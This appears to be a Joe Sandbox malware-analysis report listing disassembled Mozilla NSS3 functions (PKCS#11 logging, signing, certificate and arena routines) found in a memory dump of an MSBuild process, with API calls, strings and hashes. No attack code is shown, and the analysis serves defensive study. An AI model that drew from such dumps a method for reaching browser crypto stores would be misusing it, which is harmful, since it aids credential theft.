C_EncryptFinal, xrefs: 6CB96521
pLastEncryptedPart = 0x%p, xrefs: 6CB96590
hSession = 0x%x, xrefs: 6CB9653E, 6CB9654E

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulLastEncryptedPartLen = 0x%x$ hSession = 0x%x$ pLastEncryptedPart = 0x%p$ pulLastEncryptedPartLen = 0x%p$ (CK_INVALID_HANDLE)$C_EncryptFinal
API String ID: 1003633598-2178457252
Opcode ID: 7638e578b064ce9ce9c5582678021a354e7aebdae861e06049e921206564edde
Instruction ID: 68f3a311766beed85cf28188ce0024c9b0293a157cec97033ec02be7561bb9fa
Opcode Fuzzy Hash: 7638e578b064ce9ce9c5582678021a354e7aebdae861e06049e921206564edde
Instruction Fuzzy Hash: F431EE71601184AFDB509F64DD99F9A3BB5EB4331DF484038E808D7A12EB319E48CBE2

Function 6CB78DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6CB78E22
EnterCriticalSection.KERNEL32(?), ref: 6CB78E36
memset.VCRUNTIME140(?,00000000,?), ref: 6CB78E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6CB78E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CB78E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CB78EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6CB78EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CB78EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6CB78F00
free.MOZGLUE(?), ref: 6CB78F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6CB78F39
memset.VCRUNTIME140(?,00000000,?), ref: 6CB78F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6CB78F5B
PR_Unlock.NSS3(?), ref: 6CB78F72
PR_Unlock.NSS3(?), ref: 6CB78F82

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 3944a395663dd44b29386b2fb468ed181e79509ffac1eea40e35a55814f0da44
Instruction ID: 21883437eef8ebe721bfdc1afa60105f64fe53ac635bdfc516af5bcb68cf86f5
Opcode Fuzzy Hash: 3944a395663dd44b29386b2fb468ed181e79509ffac1eea40e35a55814f0da44
Instruction Fuzzy Hash: AE51D5B2E002159FDB209E68CC849AEBB79EF55358B154529EC28AB700E732ED4587F1

Function 6CB9CE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6CB9CE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6CB9CEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6CB9CED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6CB9CEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6CB9CF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6CB9CF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6CB9CF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6CB9CF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6CB9CF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6CB9CFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6CB9CFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6CB9CFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6CB9CFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6CB9D007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6CB9D021

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: 40b23cd4976c19afa91c107431e6c29c3f7c9442044d62cf207f4ab501bdd924
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: BB3134717529902BEF0D50676D32BEF144ACB6630EF440038F90AF57C1FA95A62702EB

Function 6CC70FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6CC71000

Part of subcall function 6CC29BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CB51A48), ref: 6CC29BB3
Part of subcall function 6CC29BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CB51A48), ref: 6CC29BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6CC71016

Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF

PR_Unlock.NSS3(?), ref: 6CC71021

Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CC71046
PR_Unlock.NSS3(?), ref: 6CC7106B
PR_Lock.NSS3 ref: 6CC71079
PR_Unlock.NSS3 ref: 6CC71096
free.MOZGLUE(?), ref: 6CC710A7
free.MOZGLUE(?), ref: 6CC710B4
PR_DestroyCondVar.NSS3(?), ref: 6CC710BF
PR_DestroyCondVar.NSS3(?), ref: 6CC710CA
PR_DestroyCondVar.NSS3(?), ref: 6CC710D5
PR_DestroyCondVar.NSS3(?), ref: 6CC710E0
PR_DestroyLock.NSS3(?), ref: 6CC710EB
free.MOZGLUE(?), ref: 6CC71105

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: ac6d2403c0bdd8b50c9140812eaaefa0cbaf0ebcc9be9119c49a1efe1c84f8ba
Instruction ID: df8c6184f48d50fa0aecb88e63c961673efcdfe0f2cb7beb087434cb2b2b371a
Opcode Fuzzy Hash: ac6d2403c0bdd8b50c9140812eaaefa0cbaf0ebcc9be9119c49a1efe1c84f8ba
Instruction Fuzzy Hash: F1318BB5A00541ABDB11AF19EC45A49BB71FF05318B584135E80913FA1F732F978EBE2

Function 6CBAEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6CBAEE0B

Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CBAEEE1

Part of subcall function 6CBA1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CBA1D7E
Part of subcall function 6CBA1D50: EnterCriticalSection.KERNEL32(?), ref: 6CBA1D8E
Part of subcall function 6CBA1D50: PR_Unlock.NSS3(?), ref: 6CBA1DD3

TlsGetValue.KERNEL32 ref: 6CBAEE51
EnterCriticalSection.KERNEL32(?), ref: 6CBAEE65
PR_Unlock.NSS3(?), ref: 6CBAEEA2
free.MOZGLUE(?), ref: 6CBAEEBB
PR_SetError.NSS3(00000000,00000000), ref: 6CBAEED0
PR_Unlock.NSS3(?), ref: 6CBAEF48
free.MOZGLUE(?), ref: 6CBAEF68
PR_SetError.NSS3(00000000,00000000), ref: 6CBAEF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6CBAEFA4
free.MOZGLUE(?), ref: 6CBAEFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6CBAF055
free.MOZGLUE(?), ref: 6CBAF060

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: 87cb32effcfd3066c6b32dad1ed47f0081925d66b7e100002d0b713977ab4a0b
Instruction ID: d0af7d4be675a8b131d989f8d23788597ec71d946b033ae9f2a839448578ed38
Opcode Fuzzy Hash: 87cb32effcfd3066c6b32dad1ed47f0081925d66b7e100002d0b713977ab4a0b
Instruction Fuzzy Hash: 668182B1A04289AFDF00DFA5DC85ADE7BB5FF08318F140024E949A7711E731E965CBA2

Function 6CB74CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6CB74D80
PORT_Alloc_Util.NSS3(00000000), ref: 6CB74D95
PORT_NewArena_Util.NSS3(00000800), ref: 6CB74DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB74E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6CB74E43
PORT_NewArena_Util.NSS3(00000800), ref: 6CB74E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CB74E85
DER_Encode_Util.NSS3(?,?,6CCC05A4,00000000), ref: 6CB74EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CB74F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CB74F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB74F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CB74F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB74F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB74FC8

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 1f7e98269068fba740d14c75d2578301b8b86ada65d67a8ba33f8b6492c0994b
Instruction ID: b801cbb09c328256ea4e1f7c7764fbaf1a26846074c5efeea0edaa2c2107b73d
Opcode Fuzzy Hash: 1f7e98269068fba740d14c75d2578301b8b86ada65d67a8ba33f8b6492c0994b
Instruction Fuzzy Hash: 51819F71A083419FEB21CF28D840B6BB7E4EB84359F148529FD6CDB641E730E9058FA2

Function 6CB70470 Relevance: 21.2, APIs: 14, Instructions: 206timeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CB704B7

Part of subcall function 6CBC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB687ED,00000800,6CB5EF74,00000000), ref: 6CBC1000
Part of subcall function 6CBC0FF0: PR_NewLock.NSS3(?,00000800,6CB5EF74,00000000), ref: 6CBC1016
Part of subcall function 6CBC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CB687ED,00000008,?,00000800,6CB5EF74,00000000), ref: 6CBC102B

PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB70539

Part of subcall function 6CBC1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CB688A4,00000000,00000000), ref: 6CBC1228
Part of subcall function 6CBC1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CBC1238
Part of subcall function 6CBC1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CB688A4,00000000,00000000), ref: 6CBC124B
Part of subcall function 6CBC1200: PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0,00000000,00000000,00000000,?,6CB688A4,00000000,00000000), ref: 6CBC125D
Part of subcall function 6CBC1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CBC126F
Part of subcall function 6CBC1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CBC1280
Part of subcall function 6CBC1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CBC128E
Part of subcall function 6CBC1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CBC129A
Part of subcall function 6CBC1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CBC12A1

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB7054A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB7056D
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB705CA
DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6CB705EA
PR_SetError.NSS3(FFFFE00C,00000000), ref: 6CB705FD
PR_SetError.NSS3(FFFFE07E,00000000), ref: 6CB70621
PR_EnterMonitor.NSS3 ref: 6CB7063E
PR_ExitMonitor.NSS3 ref: 6CB70668
CERT_DestroyCertificate.NSS3(?), ref: 6CB70697
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB706AC
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB706CC
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB706DA

Part of subcall function 6CB6E6B0: PORT_ArenaMark_Util.NSS3(00000000,?,00000000,?,?,6CB704DC,?,?), ref: 6CB6E6C9
Part of subcall function 6CB6E6B0: PORT_ArenaAlloc_Util.NSS3(00000000,00000088,?,?,00000000,?,?,6CB704DC,?,?), ref: 6CB6E6D9
Part of subcall function 6CB6E6B0: memset.VCRUNTIME140(00000000,00000000,00000088,?,?,?,?,00000000,?,?,6CB704DC,?,?), ref: 6CB6E6F4
Part of subcall function 6CB6E6B0: SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000,?,?,6CB704DC,?), ref: 6CB6E703
Part of subcall function 6CB6E6B0: CERT_FindCertIssuer.NSS3(?,?,6CB704DC,0000000B,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CB6E71E

Part of subcall function 6CB6F660: PR_EnterMonitor.NSS3(6CB7050F,?,00000001,?,?,?), ref: 6CB6F6A8
Part of subcall function 6CB6F660: PR_Now.NSS3(?,?,?,00000001,?,?,?), ref: 6CB6F6C1
Part of subcall function 6CB6F660: PR_ExitMonitor.NSS3(?,?,?,00000001,?,?,?), ref: 6CB6F7C8

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$ArenaArena_ErrorFree$Monitor$EnterPool$CriticalExitSectionfree$AlgorithmAlloc_CallCertCertificateClearDeleteDestroyFindGeneralizedInitIssuerLockMark_OnceTimeTime_UnlockValuecallocmemset
String ID:
API String ID: 2470852775-0
Opcode ID: e18bc65af00e2c26cdfc33c70d36f94b874fffd9d24cad0fcac45bb10cb7a057
Instruction ID: c579415618dc419e7395383ef5a5ab1a1b72ea12e98225b8d1e39db175338fb5
Opcode Fuzzy Hash: e18bc65af00e2c26cdfc33c70d36f94b874fffd9d24cad0fcac45bb10cb7a057
Instruction Fuzzy Hash: 4C61D271A043C19BDB20CE28EC90B5B77E4EB84358F14452AFD6597791E732E908CBA3

Function 6CB925C0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetSlotList), ref: 6CB925DD
PR_LogPrint.NSS3( pulCount = 0x%p,?), ref: 6CB9262A

Part of subcall function 6CC709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CC70BAB
Part of subcall function 6CC709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC70BBA
Part of subcall function 6CC709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC70D7E

PR_LogPrint.NSS3( pSlotList = 0x%p,?), ref: 6CB9260F

Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(?), ref: 6CC70B88
Part of subcall function 6CC709D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC70C5D
Part of subcall function 6CC709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CC70C8D
Part of subcall function 6CC709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC70C9C
Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(?), ref: 6CC70CD1
Part of subcall function 6CC709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CC70CEC
Part of subcall function 6CC709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC70CFB
Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC70D16
Part of subcall function 6CC709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CC70D26
Part of subcall function 6CC709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC70D35
Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CC70D65
Part of subcall function 6CC709D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CC70D70
Part of subcall function 6CC709D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC70D90
Part of subcall function 6CC709D0: free.MOZGLUE(00000000), ref: 6CC70D99

PR_LogPrint.NSS3( tokenPresent = 0x%x,?), ref: 6CB925F6

Part of subcall function 6CC709D0: PR_Now.NSS3 ref: 6CC70A22
Part of subcall function 6CC709D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CC70A35
Part of subcall function 6CC709D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CC70A66
Part of subcall function 6CC709D0: PR_GetCurrentThread.NSS3 ref: 6CC70A70
Part of subcall function 6CC709D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CC70A9D
Part of subcall function 6CC709D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CC70AC8
Part of subcall function 6CC709D0: PR_vsmprintf.NSS3(?,?), ref: 6CC70AE8
Part of subcall function 6CC709D0: EnterCriticalSection.KERNEL32(?), ref: 6CC70B19
Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC70B48
Part of subcall function 6CC709D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC70C76
Part of subcall function 6CC709D0: PR_LogFlush.NSS3 ref: 6CC70C7E

PR_LogPrint.NSS3( *pulCount = 0x%x,?), ref: 6CB92699
PR_LogPrint.NSS3( slotID[%d] = %x,00000000,?), ref: 6CB926C5

Strings

*pulCount = 0x%x, xrefs: 6CB92694
tokenPresent = 0x%x, xrefs: 6CB925F1
C_GetSlotList, xrefs: 6CB925D8
slotID[%d] = %x, xrefs: 6CB926C0
pSlotList = 0x%p, xrefs: 6CB9260A
pulCount = 0x%p, xrefs: 6CB92625

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Print$DebugOutputStringfflush$fwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
String ID: *pulCount = 0x%x$ pSlotList = 0x%p$ pulCount = 0x%p$ slotID[%d] = %x$ tokenPresent = 0x%x$C_GetSlotList
API String ID: 2625801553-2918917633
Opcode ID: b38b1e3966f00cc2ff2d163f3b1f9a9336804dc24ed7d674fa68198797a8bbd3
Instruction ID: 6f4a42846998c110791d68c468a139fcc0d6f85204188107ef46a4022778fe21
Opcode Fuzzy Hash: b38b1e3966f00cc2ff2d163f3b1f9a9336804dc24ed7d674fa68198797a8bbd3
Instruction Fuzzy Hash: 2731AD71A01280AFEB00CF55DD9CA9A37B5EB8335EF094079E904C7A12EB31DD58CB62

Function 6CBA6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CBA781D,00000000,6CB9BE2C,?,6CBA6B1D,?,?,?,?,00000000,00000000,6CBA781D), ref: 6CBA6C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CBA781D,?,6CB9BE2C,?), ref: 6CBA6C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CBA781D), ref: 6CBA6C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CBA6C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CBA6C96

Part of subcall function 6CB51240: TlsGetValue.KERNEL32(00000040,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB51267
Part of subcall function 6CB51240: EnterCriticalSection.KERNEL32(?,?,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB5127C
Part of subcall function 6CB51240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB51291
Part of subcall function 6CB51240: PR_Unlock.NSS3(?,?,?,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB512A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CBA6CAA

Strings

dbm, xrefs: 6CBA6CA4
NSS_DEFAULT_DB_TYPE, xrefs: 6CBA6C91
extern:, xrefs: 6CBA6C7E
sql:, xrefs: 6CBA6C52
dbm:, xrefs: 6CBA6C3A
rdb:, xrefs: 6CBA6C69

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 7b410eaf780101462c1f0472c1ef0a90c5b33cf4700f261116130378b3be4b1a
Instruction ID: 5f27187e7b69d8b9796fff1e320c54becead9eace638f169fe32ab8261d71a53
Opcode Fuzzy Hash: 7b410eaf780101462c1f0472c1ef0a90c5b33cf4700f261116130378b3be4b1a
Instruction Fuzzy Hash: 1501A2F170638277E6502BFD6C8EF66356CEF41259F140431FE04E4981FA96E51641AA

Function 6CBB25F0 Relevance: 19.9, APIs: 8, Strings: 5, Instructions: 403stringCOMMON

Download Yara Rule

APIs

